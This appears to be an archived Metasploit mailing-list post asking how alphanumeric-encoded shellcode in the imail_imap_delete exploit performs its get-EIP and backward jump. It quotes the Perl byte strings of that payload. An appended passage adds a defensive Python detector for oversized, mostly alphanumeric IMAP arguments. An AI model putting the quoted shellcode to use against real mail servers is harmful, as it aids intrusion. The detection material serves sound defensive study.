Metasploit mailing list archives
imail_imap_delete exploit explanation
From: ramatkal at hotmail.com (sol seclists)
Date: Fri, 27 May 2005 01:19:38 +0200
Quick question about the imail_imap_delete exploit.... I'm trying to do a JMP -600 bytes encoded with alphanum characters and I think spoonm did something very similar in the imail_imap_delete exploit.... The code in question is presented below:

# get eip code
$evil .= "\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59".
         "\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59";

# alphanum encoded jmp back (edx context)
$evil = "\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41".
        "\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
        "\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57".
        "\x70\x55\x50\x4b\x4f\x6b\x52\x6a";

I'm just wondering if anybody knows how this was done and how this works?

Thanks very much,
RaMatkal
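From the defender's side, the notable property of the bytes quoted in this post is that every one of them is a printable letter or digit, so a payload of this kind arrives as an unusually long, unusually uniform IMAP command argument. The following Python script is an added example (not part of the original post, not Metasploit code) showing one way a log or protocol monitor can surface that shape: it parses tagged IMAP command lines and flags arguments that exceed a length threshold while consisting almost entirely of alphanumeric bytes. The sample lines, the thresholds (256 bytes, 95% alphanumeric) and the `Q9xZ2kLm` filler are all constructed for the example.

```python
"""Heuristic detector for oversized, alphanumeric-only IMAP command arguments.

Added example: flags IMAP client commands whose argument is far longer than
any normal mailbox name and is made almost entirely of letters and digits.
Thresholds and sample traffic are constructed assumptions, not real data.
"""
import re
import string
from typing import Dict, List, Optional

# Constructed sample IMAP client lines (not captured traffic): three benign
# commands and one DELETE whose argument is 480 alphanumeric bytes, which is
# the shape a printable-only payload produces on the wire.
SAMPLE_LINES = [
    "a001 LOGIN user pass",
    "a002 DELETE INBOX.Trash",
    "a003 DELETE " + "Q9xZ2kLm" * 60,  # 8 chars * 60 = 480 bytes, constructed
    "a004 SELECT INBOX",
]

# tag, command word, optional argument string (RFC 3501 tagged command form)
IMAP_CMD_RE = re.compile(r"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")
ALNUM = frozenset(string.ascii_letters + string.digits)


def alnum_ratio(s: str) -> float:
    """Fraction of characters in s that are ASCII letters or digits."""
    if not s:
        return 0.0
    return sum(c in ALNUM for c in s) / len(s)


def longest_alnum_run(s: str) -> int:
    """Length of the longest unbroken run of alphanumeric characters."""
    best = cur = 0
    for c in s:
        cur = cur + 1 if c in ALNUM else 0
        best = max(best, cur)
    return best


def analyze_line(
    line: str, max_arg_len: int = 256, min_alnum_ratio: float = 0.95
) -> Optional[Dict[str, object]]:
    """Return a finding dict for a suspicious command line, else None.

    A line is suspicious when its argument is longer than max_arg_len and at
    least min_alnum_ratio of it is alphanumeric. Both limits are assumptions
    chosen for this example; tune them to the mailbox names seen in practice.
    """
    m = IMAP_CMD_RE.match(line.rstrip("\r\n"))
    if not m:
        return None  # not a tagged command; untagged/continuation data ignored
    args = m.group("args") or ""
    if len(args) <= max_arg_len:
        return None
    ratio = alnum_ratio(args)
    if ratio < min_alnum_ratio:
        return None
    return {
        "tag": m.group("tag"),
        "cmd": m.group("cmd").upper(),
        "arg_len": len(args),
        "alnum_ratio": round(ratio, 3),
        "longest_run": longest_alnum_run(args),
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyze_line over every line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

Legitimate long mailbox names usually contain dots, slashes or spaces, which pulls the alphanumeric ratio below the threshold, so the two conditions together are what keep the false-positive rate down; a long name with separators is not flagged, while a long separator-free run is.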
Current thread:
- imail_imap_delete exploit explanation sol seclists (May 26)